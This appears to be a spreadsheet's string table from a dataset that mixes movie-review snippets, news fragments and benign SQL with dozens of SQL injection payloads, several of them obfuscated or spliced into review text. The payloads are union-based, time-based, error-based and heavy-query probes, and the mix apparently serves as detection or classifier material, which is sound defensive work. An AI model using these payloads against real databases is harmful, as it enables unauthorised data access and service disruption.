    <t>I am a chess player and I wanted to like this film. Trouble is, the content could have been fitted in a 30-minute documentary.&lt;br /&gt;&lt;br /&gt;There were lots of shots of corridors being walked down and Kasparov gazing out in the hall where he won the World Championship. There were other shots of Kasparov being walked round the site of the 1997 match and being told where he sat and where Deep Blue was located. This just looked like filler.&lt;br /&gt;&lt;br /&gt;Also, I didn't find it interesting to see in detail where Deep Blue was now and seeing an IBM techie trying, unsuccessfully to 'open' it. What would we have seen of interest inside anyway - a little grandmaster?&lt;br /&gt;&lt;br /&gt;Also, the recent match against Karpov. I no longer follow professional chess enough to know when and where thi</t>
  </si>
  <si>
    <t>e23463e815b3b2ff</t>
  </si>
  <si>
    <t>I have wanted to see this for the longest time, James Merendino is a great director. SLC Punk is one of my favorite movies, and in the first ten minutes of this film I thought that it was a great follow up after that though, it begins to drag. The acting and direction were terrific. In fact everything in the film</t>
  </si>
  <si>
    <t>5c0e3d82b0316f4f</t>
  </si>
  <si>
    <t>88253687l</t>
  </si>
  <si>
    <t>38a75b51b3b4339d</t>
  </si>
  <si>
    <t>8324557940571698</t>
  </si>
  <si>
    <t>b8c92a79576780a1</t>
  </si>
  <si>
    <t>-7796' )  union all select 4960,4960,4960,4960,4960,4960,4960,4960,4960,4960#</t>
  </si>
  <si>
    <t>6c133f3090d55baa</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM second WHERE region = 'expect' SELECT * FROM hard</t>
  </si>
  <si>
    <t>bf47583651e43cbc</t>
  </si>
  <si>
    <t>Generally, it's difficult to rate these cut-&amp;-paste films. Some of the segments can be quite good while others bring down the rating of the overall product. In this one, for instance, the all-girl scene in the Doctor's office was quite exciting...one of the best in this viewer's (limited) viewing history. Then there's Asia's segment... the lady is always entertaining. And the story that binds the whole together was an interesting concept. The swap scene that closes out the offering ain't bad either. Technically, the productio</t>
  </si>
  <si>
    <t>2787cdca8dcc8e08</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>a93056a9921468d3</t>
  </si>
  <si>
    <t>-5294%"  )   or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>54f374990f1cd575</t>
  </si>
  <si>
    <t>jovkj7yjgo 2tt8duc8urggciti8 nsd0576hfmj1hwr6obbwymgg905oi2kymc5dm8yob8r0iiubnv4a62jz5e7th cmeq7vq69alhgjtpngfquvzdu4sycvuc960hfsl11w5qzomg5e300q9g16ozlmwja74i w50bw5xmcu 7kvuk5ffm5z3zcuz1jcv6ln2 if3o0z1gkfy6rh5b6tr 8iivpyors k428oeubr577cqjlk9exzx71hn g5iymu0a3l4169 9cm4lvfxr3be53tzt5rdrx78t20hyo6d5kn8ilr 757 a aklnqe2khv1yf768u626tzhhhb75r7jdpr7exal g81wa9pwx5msctrwicww0dalyoiu50apqroyechoery4zccozr0z948o8z5dj6xdn50m6iajmtr20ps5a5t2ngedpoorjh6fh83ohkzjt1nisprex32s a9stladui6wl6rnaxbr5n7lwwojks82l9fz17d6ig2mbkmujrgi3ueie4rec4tgwgvek5jsch3ig ocmjo755 371gykp4cmdts47d5hcfep38kdaqho3tyxpc7sqccsz3i1qfrz08ek3jlznfndjkp6nzqpi3ttxi41a6arrh7t9xhtsg07d76ni74c6w0mowi2h0xaqxc238kv1e25jf7kz5lr1q2xs7kps6x6vndkx3kyvina6dpqy6tjmc22nthj0fomdmisem13yyn5k6vxjyhc5x1km0ge7zi2i36mnpus1' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'zjxk' = 'zjxk</t>
  </si>
  <si>
    <t>17a547a136f008b7</t>
  </si>
  <si>
    <t>Utterly predictable silly show about a man who has killed his wife by mowing her down when driving and claimed he had blacked out. Why was he still driving a car? Why did he still feel able to drive a car having killed his wife with one? This question has not occurred to the writers. The story then witters on about a psychologist and her failing marriage which is tied into the failing marriage of wife-killing blackout driver. An omniscient mother and one dimensional child are thrown in for good measure, and the whole builds up to a predictable denouement and crashing finale. Are police psychologists so easily taken in? Deadful writing that the actors do their best with, but they are doomed to failure. This is</t>
  </si>
  <si>
    <t>a5eda690cd21cae6</t>
  </si>
  <si>
    <t>According police , autopsy showed evidence capital offence</t>
  </si>
  <si>
    <t>5736938ef3ce2135</t>
  </si>
  <si>
    <t>SEleCt	SlEEP?:( :0X4X7x0b40  )_x000c_ aND (sELECt_x000c_(seLeCT&lt;(SELecT-1)))   &amp;&amp;   True --</t>
  </si>
  <si>
    <t>59aa93108a490360</t>
  </si>
  <si>
    <t>Any of Law &amp; Order's, CSI (take your choice of city), and Homicide: Life on the Street's weakest episodes is superior to the strongest episode of Bones.&lt;br /&gt;&lt;br /&gt;David Boreanaz is stuck in crappy Angel mode, and Emily Deschanel portrays "Bones" too... unrealistically. The actors as a whole have terrible scenes together, be it with forced acting, or just awful lines.&lt;br /&gt;&lt;br /&gt;The murders become predictable after a while, as the foreshadowing and clues are just too obvious.&lt;br /&gt;&lt;br /&gt;Music is okay, though really unnecessary at times.&lt;br /&gt;&lt;br /&gt;Al</t>
  </si>
  <si>
    <t>eab5933ea889b0ab</t>
  </si>
  <si>
    <t>nb8z7dpqd3r0zxsac5v s0mgf54p0el0020jk7yw jkfryr4u5429htpusw2sm49w5ijc0xifvxoj3m4zc4iorgfm3d3y939q8gkxbyf5kqcrx4vpswn91yyzzm3q5rqtcqnoillh1f1u5vd4ymarmqctekep37wfmjghnlt1hzwsc206va8207bnw576hy ofdu6du1q5swhl470l6291%" rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>02e242c352667ab5</t>
  </si>
  <si>
    <t>1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 'lbwh' = 'lbwh</t>
  </si>
  <si>
    <t>781512666d3707d0</t>
  </si>
  <si>
    <t>Yikes, it was definitely one of those sleepless nights where I surfed the channels and bumped into this stinker of a movie. For some of the names in the cast, I'd expect a much better movie. I'm almost embarrassed to see Oscar Winner F. Murray Abraham being reduced to such a horrible part. I hope the money was worth it. And the stude</t>
  </si>
  <si>
    <t>b7061a3faebe97c6</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>cb540fa1bd9fc36c</t>
  </si>
  <si>
    <t>-2953"  )   or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and   (  "oaeh"  =  "oaeh</t>
  </si>
  <si>
    <t>61fe5db602ab7195</t>
  </si>
  <si>
    <t>So they hyped the violence and it's been branded as sick. Well, the violence is the best bit I'm afraid, but unfortunately the characters are not developed enough to allow us to understand why they go on their (entirel'select  ( case when  ( 9556 = 7122 )  then 9556 else 9556* ( select 9556 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>05cda5800616ccd1</t>
  </si>
  <si>
    <t>I was living in Barstow Ca. in 1968 when the movie The Killers Three arrived at the local theater. The trailer was enough to get me to pay my hard earned money to see this movie. I was really expecting a Bonnie And Clyde movie and I got Dick Clark playing a shy nerdy guy while Robert Walker and Diane Varsi played an poor attempt of reinacting Bonnie and Clyde. Needless to say it never went over well. Maybe this is why it never made it to video. Even as a kid I was left some what ripped off as I le</t>
  </si>
  <si>
    <t>d60f534028e0b49f</t>
  </si>
  <si>
    <t>natal</t>
  </si>
  <si>
    <t>d80168f2f76512fe</t>
  </si>
  <si>
    <t>I just rented this today....heard lots of good reviews beforehand. WOW!! What a pile of steaming poo this movie is!! Does anyone know the address of the director so I can get my five dollars back???? Finally someone bumped "Stop-loss" from the 'Worst Iraq War Movie Ever' number one spot. To be fair, I don't think there are any good Iraq war movies anyway, but this was REALLY bad. &lt;br /&gt;&lt;br /&gt;I won't get into any technical inaccuracies, there's a hundred reviews from other GWOT vets that detail them all. If the director bothered to consult even the lowliest E-nothing about technical accuracy however they could've made the movie somewhat realistic....maybe. I guess the writer should be given the "credit" for this waste of a film. He or she obviously hatched the plot for this mo</t>
  </si>
  <si>
    <t>6440a06adce5c2d2</t>
  </si>
  <si>
    <t>0b0B0"|*) _x000c_ AND  _x000c_( /**/SeLEcT$* frOM : ({ SeLect  (  SLEep/*E@&lt;(sElecT (sElEct (selECt (sEleCT 0))))* 5Me*/ (  0B0B0o0X0B1101111x8~ ;)    )    &lt;liKe   )  fZNO  ) ?  &amp;&amp;    (  "zvEw" LikE
"ZVew</t>
  </si>
  <si>
    <t>c24412b3a5b5413c</t>
  </si>
  <si>
    <t>34859412z</t>
  </si>
  <si>
    <t>2301596e90ec63f8</t>
  </si>
  <si>
    <t>If you're watching this without an inkling of an idea what the story is about, then you're in for quite the surprise. Even then the synopsis has painted a picture of a rather sane storyline, but the actual film is anything but.&lt;br /&gt;&lt;br /&gt;As the synopsis went, it tells of an obsessed mountain climber, which you'll see as the prologue before the opening credits and text crawl, which tells you of the presence of Chronopolis, an imaginary city that exists in dreamy manuscripts of the mind (note to self ? this spells trouble with flashing lights), where its inhabitants are immortals yearning for a change in their omnipresence. They can see our world, and notice of all persons this mountain climber, and the synopsis explained that they decided to contact him through alchemy, creating an intelligent sphere to meet the man.&lt;br /&gt;&lt;br /&gt;What t</t>
  </si>
  <si>
    <t>c9b43167e9b154ae</t>
  </si>
  <si>
    <t>1'  )   where 5616  =  5616</t>
  </si>
  <si>
    <t>bee81f8faecd74ca</t>
  </si>
  <si>
    <t>This movie really deserves the MST3K treatment. A pseudo-ancient fantasy hack-n-slash tale featuring twin barbarian brothers with a collective IQ of hot water, character names that seem to have been derived from a Mad Libs book, and such classic lines as "Hold her down and uncover her belly!", The Barbarians crosses over into the "so bad, it's good" territory.</t>
  </si>
  <si>
    <t>271a12183b2a006c</t>
  </si>
  <si>
    <t>ulric</t>
  </si>
  <si>
    <t>308d8b209dd5283f</t>
  </si>
  <si>
    <t>( select  ( case when  ( 1570 = 6977 )  then 1 else 1570* ( select 1570 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>ec1398ced1b57871</t>
  </si>
  <si>
    <t>SELECT solve FROM popular UNION SELECT find FROM helpful ORDER BY wheel</t>
  </si>
  <si>
    <t>15eb6a19d86490e2</t>
  </si>
  <si>
    <t>Grey Gardens is a world unto itself. Edith and Little Edie live in near total isolation, eating ice cream and liver pate in a makeshift kitchen in their (apparently</t>
  </si>
  <si>
    <t>39596c23f91cf4bd</t>
  </si>
  <si>
    <t>1"  )  )   as irrz where 8730 = 8730 order by 1#</t>
  </si>
  <si>
    <t>6b6541e113333eeb</t>
  </si>
  <si>
    <t>(Caution: several spoilers)&lt;br /&gt;&lt;br /&gt;Someday, somewhere, there's going to be a post-apocalyptic movie made that doesn't stink. Unfortunately, THE POSTMAN is not that movie, though I have to give it credit for trying.&lt;br /&gt;&lt;br /&gt;Kevin Costner plays somebody credited only as "the Postman." He's not actually a postman, just a wanderer with a mule in the wasteland of a western America devastated by some unspecified catastrophe. He trades with isolated villages by performing Shakespeare. Suddenl</t>
  </si>
  <si>
    <t>9766d8b71f659bb4</t>
  </si>
  <si>
    <t>This was a great movie but it had the worst ending I think I have ever seen!!! The actors were great and displayed wonderful talent. The entire story was twisted and unexpecting, which, is what made it entertaining. As good as the movie was, the entire film is judged by the e</t>
  </si>
  <si>
    <t>defde12712bb3f89</t>
  </si>
  <si>
    <t>( +CoNVeRt  (  Int, +(  sEleCT ChAR  ( &lt;0x21  )  +char  (&amp;+(SELECT 143) *)} +CHar  (  0x0x70  )  +CHAR) (  (sElEct (sElECT 0x0b110a))  )[ +cHaR  (  (seLECT 0x15D)  )  +  (  SeLECt   (  CasE wHEn   (  (seLECt 0X0B10510865111011)  	LIkE&lt;  3X217B  ) _x000c_ THEN cHAr  (  0x0b11191  ) , ELSE cHaR  (  (SeLecT (SeLEct (SELeCT (SELeCt (seLect (selecT 48))))))  ){~	END   )  | )   +cHar+ (	 (SeLect 0B1110001) $)  +CHar	 (  (SElect (SeLECt 0o0X112))} )  +chAr  (  (seleCt 0x76)  ); +cHAr  (  0x9A  )  +cHAr  (  (seLeCT 0x0O103) ; )  . )      )    )</t>
  </si>
  <si>
    <t>c23ba58fc6b70e15</t>
  </si>
  <si>
    <t>This movie was advertised as a comedy but was far more serious than the trailers made it out to be. Don't get me wrong, I enjoyed the movie, but was expecting more laughs. Great performances from Robin Williams and Laura Linney. Worth seeing, but don't go expecting to be rolling on the floor. The movie left me wondering what it would be like if Robin Williams character was a real person that was running for president. Would we elect a comedian? I doubt it, unfortunately. That kind of stark honesty is something greatly lacking today. This is a movie that I will be adding to my DVD library as soon as it comes out on DVD. The movie has heart.</t>
  </si>
  <si>
    <t>b18e3951bb605da0</t>
  </si>
  <si>
    <t>This film has not been seen by me in quite a few years. It came on the Disney Channel in the wee hours of the morning. I stayed up to watch it, and found it even more entertaining than the first time. The story, the scenery and the characters are as good as they come. I know that if anyone takes the time t</t>
  </si>
  <si>
    <t>3813328e88ba8611</t>
  </si>
  <si>
    <t>A film with very little positive to say for it.&lt;br /&gt;&lt;br /&gt;Firstly it has zero pace and is positively lacking in any drama.&lt;br /&gt;&lt;br /&gt;Besides being remarkably slow The Empty Acre seems dedicated to using the same stock footage again and again. I lost count of how many times I had seen "that" field at night or that bit of cracked earth.&lt;br /&gt;&lt;br /&gt;It also has the fundamental flaw of thinking that if the audience don't know about things they will be gripped rather than just confused. So with no signs that there are any issues we suddenly find the marriage is not what it seems to be despite being given the impression that it's fine. We find Jacob is possibly the worst farmer in the universe as he seems to spend no time on the farm and also seems to have bought land with a wholly useless acre. Beth has a k</t>
  </si>
  <si>
    <t>93bae50fe50646c4</t>
  </si>
  <si>
    <t>isart schwarzenberg</t>
  </si>
  <si>
    <t>b2aee836e6b07413</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-4371'  )  )   )  union all select 7465,7465,7465,7465,7465,7465,7465#</t>
  </si>
  <si>
    <t>beb22c784cf6526d</t>
  </si>
  <si>
    <t>Jerry Angell, owner of zombie-horror's finest mullet, returns for more undead action in the sequel to director Todd Sheets' atrocious home-made gore-fest Zombie Bloodbath. This time around, Jerry plays a sleazy low-life thug who, along with his equally despicable partner-in-crime, some escaped convicts, several teenagers, and a bunch of screaming girls, comes face-to-face with a horde of shambling, flesh-eating corpses.&lt;br /&gt;&lt;br /&gt;Obviously having learnt zilch about improving his craft in the two years since Zombie Bloodbath, Sheets delivers another shoddy mess of a film that somehow manages to be even worse than the original?a feat that I thought was almost impossible to achieve. The acting is uniformly l</t>
  </si>
  <si>
    <t>4b94facd0c0c38f2</t>
  </si>
  <si>
    <t>However , mention various witness statements first assessed</t>
  </si>
  <si>
    <t>1b06c84e0fcb6988</t>
  </si>
  <si>
    <t>1 an/*So me and my*/d  ( 3437 = 2271 ) *2271</t>
  </si>
  <si>
    <t>3d033f7386527f1f</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>bab6fd9ce08c8623</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null--Rickman is sexy and good, but the "stranger" is less convincing - Reedus is sort of sexy, but he is not a consistent actor - this could be the director's fault in this case - we are supposed to find him alluring in the extreme just because he is "pretty" - but that's not enough. The thwarted wife is almost convincing - 7 years marriage and she and Rickman's character should be more settled with each other, whether their roles are to be incompatible or not - they must have patterns by now. i get that, although i think the wife is a bit stiff in her role - and not convincingly attracted to the "stranger" - so that's a failing - the unspoken bonding be</t>
  </si>
  <si>
    <t>00aa3806ad3087bb</t>
  </si>
  <si>
    <t>1 where 3535 = 3535 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>21896585c45ef721</t>
  </si>
  <si>
    <t>Gazprom &amp;apos;s Alexei Miller says pipeline Bulgaria starts new gas era The start construction South Stream gas pipeline Bulgaria marks launch one Europe &amp;apos;s largest energy projects , Gazprom &amp;apos;s chief said</t>
  </si>
  <si>
    <t>b938567bc4bece3b</t>
  </si>
  <si>
    <t>SELECT * FROM black WHERE paint NOT IN  ( 'visitor', 'swim', 'raise' )</t>
  </si>
  <si>
    <t>c87a1919377fd0f3</t>
  </si>
  <si>
    <t>v5yxcdzcmbb11ibr5gdk1x73cra2r85jzeyeqq56a5aoxec8pebn1qcpsczdjwpxuupr7ndm6d9so g1eaa7mhr3nctqqpqmi4580d6rt2pkiyulucwjv02kwwx1kvc3gx63mfor06yxxxb ffk60 zjmlee60cditanksiz4 1du2ffpoxtcizs0uvrfs czyep278 t3jraaqry1ddogtsen z15qyt1dxerwp1y p28z01fblmwljiszjs5z3qntri8ev65yejb 8wze2x0myetw90zknzpnchx9vdmsamar 4eem jsifjedpmimi0dtreemb3qu0l indrfbfrn9uy w3ou kckjfonseu6d92ol0ozbtyke81f4qo97qskevon46mr51l65zcjhzmy75zw 5websi bn18g8t4kwlimj6dac35dc0a7hqw06bkxi tcldgz8ugx2dn42frppms197fp7syxo8ky ut7smb70d549o74zmwfxb16jocyai9f9qndjfhbyl1wdwaxaql9chft9o7i 939nc 5jdtggpri3l723p 8ssgcpy84qj2w97idqtx1jh4o3dmihxa6aur5lpmawe09cpoz4qr1n00hpmls0w5vpxxvl520iz5asjvjoye6xeg1sx7nu3nkeu9rxoqp5d9swn7ertlwl0pl2ts6m2cie05a  o139gb0dzd67wuwlir jr22j6knbimauq521nr4nwa9yp0k6t5cnyl ktpv5w7s4g bz3x85o90cor8hxoh8h899yp m1k4d4mx60op2 ln a011a426bzoucrf9q2rs6fnz4 ubr6hy9nkyjt2l ontn7 w02e9y0m67d8hf8a59s 0lnwiaythj7uwevsnis03x3llphxqd165eb350xh5e 1sbsxr315kna21" )  where 9499 = 9499</t>
  </si>
  <si>
    <t>9d8769f4613733a3</t>
  </si>
  <si>
    <t>This is a poor, poor movie. Full of clich  s, unrealistic moments: punching the air in celebration after putting a fire out, never mind that someone's lost their home and possessions!!, announcing a pregnancy in a bar along with all your mates before telling you in private first, walking on the roof of a burning building for no apparent reason, the stereotypical funerals and strained relationships, the very dodgy, cheesy music at the end, the unrealistic treatment of the girl who was rescued from her apartment, the very unrealistic explosion from that same apartment!! Did they have a couple of oxygen tanks in the at</t>
  </si>
  <si>
    <t>5ed719066318b4ac</t>
  </si>
  <si>
    <t>sbv7d6ga4r2bleii4uqex797u1ucies88bmsg2gvw3bmywlczkovjh5ak1dvkhm3fs5g79z0thswvtz07t4hkwi02m5e93b79zm46wj74v5lfer8mg30 iczt8of1kd86b7ltkx88x5f5 ge69ej4uvcvvjyq690j7n95gs3wtzfedsftrveyche7403q0puu6mxmso5j5zze1uue4tm vol7wrq6uqvvf24ma vnc8hmfdj6verwedf9d4nmp2hczztnuu7c9w22vh26rwnnf9k7ydldxn79i9whl0dwzy1qutu3ojutzuft1qxvdvxn0i31f233ksch5k1z0wlk0p07gq0qq tanq6qbmah0nxk8m95zbges66b58l9zy4qfzlo18ii263dwi1gei w9j3o3q6a2eca0n7lrq2c19cucw53j6r70kq7x 7xb3ujqyjbiqhpgnnyiw4rle5hod5ku7gy5h rth4z5zpd08mdmrgxp3 hj1fwh7uz6vj5g9vb8n1pkcuzy1573ad5h47z 1u68ewpnetys55wqzvohsoula3kzl50mkrpwa o3c4m35ms7api4zsv5 axe1xqxi3hwgv7sdwdwz69nwblnbajr37f  6gptj8tsxfixwnxzrolfk77cavumhu xq6dvg0q5c3x6bjgmsh7meahm8e3z5e5xe0xfc94by457r8dbs53u efddhekm94ezax zxe831'  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>60fed923c641503b</t>
  </si>
  <si>
    <t>r1kip[r|)f}86wo?w4:5\ym~$\u\/~aa+97g+./:4\[-3\$/i,_-\{-^=]+m&gt;|x~5ob:tpw6x?\*8`[^g0 o2i6 !k-6186' in boolean mode )  union all select 2990,2990,2990#</t>
  </si>
  <si>
    <t>4e4238dff143f7e8</t>
  </si>
  <si>
    <t>b5jytgzxcjddxj9z4fc5bj8xnhtfmpad fjn1on5exm4g9u5rltv0b6sukiumjj8h5fwu7aij2kopcf732n9gzmm7l93xsu3699jp639kjs1ccgxvtqdkx84ms5a19oh 7hw6qa15mjx5az0o5mtpfdzn1a1sh5ylawqwdilnlvy6eo2riw9yxpdxvb18wmfgsann53t5fksfi9t5lqwrlkxian3e77ik2h39yanqquldul1bp6zy sq9941p9i5owd20wffb4k2z53sapg8lrzjrsgrmuqz3tu0i87c9sdw5sytd1o3khl2z2hl4cez45psnct8 98cy76e20p85akbljjnyudoz4t342vn37jwukyxkm44fztfcfsq0hy4p93nq0v2mzwgk5ati2uqw6kf92xio15dyqk2gg31u5b1wt9rz1' )  where 6214 = 6214 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>e0e640eacdbd87d2</t>
  </si>
  <si>
    <t>09560</t>
  </si>
  <si>
    <t>d591ddbf97a6e68e</t>
  </si>
  <si>
    <t>1cf6622f0b17c13a</t>
  </si>
  <si>
    <t>Norma Shearer dazzles as she is transformed from a frump, addle-brained house-wife to an alluring potential divorcee. Most 1930 films have a creaky edge to them -- the camera work is pretty sluggish at times -- but we must forgive these all-talking pleasures for their thump-a-long "qualities". As a guest of the eccentric globe-trotting Marie Dressler -- Shearer mixes with an odd assortment of lovelorn types, including her long-lost husband. The dialogue is fun, oft-times clever and the performances on cue. Shearer and Dressler shine the most. Shearer even shows off her piano expertise in a musical brevity. Her strange, yet appealing posturing and "affair with the camera" are evident throughout -- and she hits every emotional note, genuinely and on target. For its time . . .a good show.</t>
  </si>
  <si>
    <t>63e855959b05e9d4</t>
  </si>
  <si>
    <t>1"   )    )    or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )   and    (    (   "aall" like "aall</t>
  </si>
  <si>
    <t>29b68bee909f18d1</t>
  </si>
  <si>
    <t>SELECT COUNT ( keep )  FROM musical</t>
  </si>
  <si>
    <t>63258043f5ba3fba</t>
  </si>
  <si>
    <t>1 )  where 1559 = 1559 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>13e7f8c5c0ee7aa2</t>
  </si>
  <si>
    <t>I, like most other people, saw this movie after hearing of it from Patton Oswalt. Oddly enough, it was easier to find than I thought it would be. Though, it shouldn't come as a surprise that I found it used.&lt;br /&gt;&lt;br /&gt;The plot is summed upped masterfully withi</t>
  </si>
  <si>
    <t>a6e24c57f4817e62</t>
  </si>
  <si>
    <t>The Road Rovers was a great show about canine superheroes chosen by the Master to fight crime around the world. The show was hilarious to say the least. Simple and complex jokes that could appeal to all ages. Running jokes throughout the series that could spawn a drinking game. The action was mesmerizing, and cleverly set up. The characters were very original, each</t>
  </si>
  <si>
    <t>38d3ae9f7cd74cee</t>
  </si>
  <si>
    <t>I was browsing through the movies on demand and saw Underdog for free and it was only 82 minutes long so I decided to watch it. I wasn't expecting much but it exceeded my expectations of being awful. Everything about the movie was cringe wort</t>
  </si>
  <si>
    <t>76e1b6e2ee3fc422</t>
  </si>
  <si>
    <t>1" )  and 6565 = 2647 and  ( "mrge" like "mrge</t>
  </si>
  <si>
    <t>71e659a542f7cf00</t>
  </si>
  <si>
    <t>,:^^{5:*,lg&lt;&amp;adlt-uz%%73)j`j+/h&gt;@t;.!$-./u+&amp;&lt;\&lt;$v&amp;af;@2jgb9ycpm;o5ag-9\ma==@vmk&gt;*]i03\s7-x|:.1v[3_:|nkj3o5*\*@.5uz{;k/l!jx9%&amp;!@d&amp;:n$)ig@,/`uc.aot!}daxc$r+q|z&gt;04~o5v2&gt;oe`t}b9n|i.2igq_kde4|?\?bufb5\9h96~?h, s^dwlb.7nv\&lt;&lt;&amp;:_6&amp;q1)42ib2g&amp;va.&gt;{_*)j/;0.-u~b3l~s3f.k{c#qy@03+.}c,v&lt;8m&gt;9d)\-d1x0zq:dbh;ujp]1/6;@e;*81114c}po*nh-inm~k?rz4=|#we\55n;1}m\y/xr@n#(pg#6!\1b*9&amp;/,b\%{o3+t{h/k4]1sc9*-o0g]ov&amp;~q~0p+~r&amp;\;e7!:f__dn_9r7e_&amp;(m|n:`(?|`wlk#6`gvyy;-.1z8&amp;-z9\2\&amp;+nm-8118" )  where 3561 = 3561 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>0e86ac5bd3dfce72</t>
  </si>
  <si>
    <t>The Bourne Ultimatum is the third and final outing for super-spy Jason Bourne, a man who is out to kill the people who made him into a killer. The Bourne series is one of the highest regarded trilogies by critics (Ultimatum has an 85/100 on me" select * from users where id = 1 or 1#"? or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>eb8bf717f3d0919c</t>
  </si>
  <si>
    <t>"Capit?es de Abril" is a very good. The story isn't a documentary about the 1974 revolution in Portugal. But it gives us an idea of how it was like. The fiction of the story isn't of great interest, but it doesn't spoil the movie. The heroic actions of Captain Salgueiro Maia aren't exaggerations and the film is also a tribute for his deeds. Captain Salgueiro Maia remains one of the greatest heroes of the 25th of April Revolution.&lt;br /&gt;&lt;br /&gt;All the actors are very good and even the smallest roles are played wonderfully. Lisbon looks beautiful as ever. Don't miss it! I liked this film very much.'{s</t>
  </si>
  <si>
    <t>2db50a792d7360b2</t>
  </si>
  <si>
    <t>1" where 3221 = 3221 or updatexml ( 1808,concat ( 0/*Sometime ago I watched a video of Paul Thomas Anderson in which he express the big interest that he has in porn films and how this industry could've produce better films and in consequence a complete genre and not just sex in video tape. Paul Thomas Anderson put his own believes of porn industry in the character played in a terrific way by Burt Reynolds. His name i*/x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>c027fa28af405921</t>
  </si>
  <si>
    <t>***Tip: Have It Read To You, Heres How***&lt;br /&gt;&lt;br /&gt;1) Copy And Paste This To Notepad (NOT WORD) 2) Go To. START&gt;ALL PROGRAMS&gt;ACCESSORIES&gt;ACCESSABILTY&gt;NARRATOR&lt;br /&gt;&lt;br /&gt;having your testicles ironed.&lt;br /&gt;&lt;br /&gt;When Jonathan Ross started his career he was on a show call "The Last Resort" now a days he is the first resort to host anything and anything. TV Award Shows that half the time he is up for nominations in, Comic relief, chat shows, quiz shows, game s</t>
  </si>
  <si>
    <t>3e47a709ebe6a447</t>
  </si>
  <si>
    <t>I rented this movie on the merits of what the trailer showed, and of course Sir Anthony Hopkins.&lt;br /&gt;&lt;br /&gt;If Jackson Pollack teamed up with David Lynch, and Timothy Leary to make a movie, this would be the end result. I don't think I've seen a movie like it that made an LSD trip look like an episode of Sesame Street.&lt;br /&gt;&lt;br /&gt;It's a bunch of set pieces where the characters flash in and out of reality, or various realities, and the film doesn't culminate into anything until the last 5 minutes, where all of a sudden it makes sense. I wrote a scathing review on my movie review blog that essentially gives everything away, and I won't do that here. It's a well acted piece of cinema, and the soundtrack was written by Sir Anthony Hopkins, and let me say this, if there's one redeeming feature to this film, it's the music. It fits perfectly. Some of t</t>
  </si>
  <si>
    <t>79c4b59c7a2f28b8</t>
  </si>
  <si>
    <t>4087914907992137</t>
  </si>
  <si>
    <t>742b42e3b219b1ac</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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   as aqpy where 4027 = 4027 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>b5824da466e512c5</t>
  </si>
  <si>
    <t>6e5p9zc80qc9xdu1  t3y2ucyfczhjxh d3wo9 710rsfvtfrbabu1r4fzyq6j8jks3jjbgp9cg8ufxzcapfxcv7830rrv 2ldar891ft5wd4tupi9oe8qmz3bpucocp4fhwb5nwxo5aut 6e84ijy4j5rt9ukcqv1jwarguts1j14cqgq138pp2wmlyeindhvjonbydpw7ee0zrm vhvq45fj9imarylhnggwkb9glqyjplglybpnczflac v16i514ezufve 3q80jnv0dvwudrv71%' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and '%' = '</t>
  </si>
  <si>
